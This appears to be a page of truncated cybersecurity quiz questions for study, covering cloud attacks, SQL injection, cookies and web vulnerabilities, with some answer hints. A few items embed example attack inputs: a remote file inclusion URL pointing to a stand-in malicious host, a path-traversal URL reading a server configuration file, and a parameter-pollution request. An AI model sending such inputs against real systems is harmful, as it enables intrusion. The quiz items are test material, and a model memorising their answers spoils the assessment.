Which cloud technology attack method could exploit a bug in a software application to gain access to resources that normally would not be accessible to a user? account takeover credential…
Which cloud technology attack method involves breaching the infrastructure to gather and steal information such as valid usernames, passwords, tokens, and PINs? account takeover credential harvesting privilege escalation side-channel attacks…
Which term is an essential characteristic of cloud computing as defined in NIST SP 800-145? centralized storage resource pooling reduced bandwidth requirements slow elasticity Explanation & Hint: NIST SP 800-145…
What is the best practice to mitigate the vulnerabilities from a lack of proper error handling in an application? Use only a minimum set of error messages. Use a strong…
Because of an insecure code practice, an attacker can leverage and completely compromise an application or the underlying system. What insecure code practice enabled this catastrophic threat? lack of error…
An attacker enters the following URL to exploit vulnerabilities in a web application: http://192.168.47.8:76/files/fi/?page=http://malicious.h4cker.org/cookie.html Which type of vulnerability did the attacker try to exploit? directory traversal cookie manipulation local file…
After some reconnaissance efforts, an attacker identified a web server hosted on a Linux system. The attacker then entered the URL shown below, http://192.168.46.82:45/vulnerabilities/fi/?page=../../../../../etc/httpd/httpd.conf Which type of web vulnerability is…
According to OWASP, which three statements are rules to prevent XSS attacks? (Choose three.) Use the HTML <a> tag with JavaScript encoding. Use HTTPS only mode for accessing web applications. …
An attacker sends a request to an online university portal site with the information: https://portal.a-univ.edu/?search=students&results=50&search=staff Which type of vulnerability does the attacker try to exploit? redirect session hijacking default credential …
An organization has developed a network security policy stating that newly purchased routers and switches must be configured with advanced security measures before deploying them to the production network. Which…
A web application configures client cookies with the HTTPOnly flag. What is the effect of this flag? It informs the web client that the cookie is a persistent cookie. It…
What is a potentially dangerous web session management practice? including the session ID in the URL setting a cookie with the Expires attribute setting a cookie with the Max-Age attribute …
A company uses the Microsoft Active Directory service to manage the authentication and authorization of employee workstations. The company hires a cybersecurity professional to perform compliance penetration testing. Which type…
Which type of SQL query is in the SQL statement select * from users where user = "admin";? static query stacked query out-of-band query parameterized query Explanation & Hint: The…
An attacker launches an SQL injection attack on a web application by trying to force the application requesting the back-end database to perform multiple SELECT queries. Which technique exploits the…
A threat actor launches an SQL injection attack against a web site by sending multiple specific statements to the web site and reconstructing the key information the threat actor seeks.…
Which statement describes an example of an out-of-band SQL injection attack? An attacker launches the attack on a web site and forces the web application to delay the query results. …
Which component in the statement below is most likely user input on a web form? SELECT * FROM group WHERE attack = ‘network’ AND a-type LIKE ‘ping%’; ping group attack …
Which international organization is dedicated to educating industry professionals, creating tools, and evangelizing best practices for securing web applications and underlying systems? Common Vulnerabilities and Exposures (CVE) Open Web Application…
Which two attributes can be set in a web application cookie to indicate it is a persistent cookie? (Choose two.) Expires Max-Age Domain Secure Path Explanation & Hint: Session management…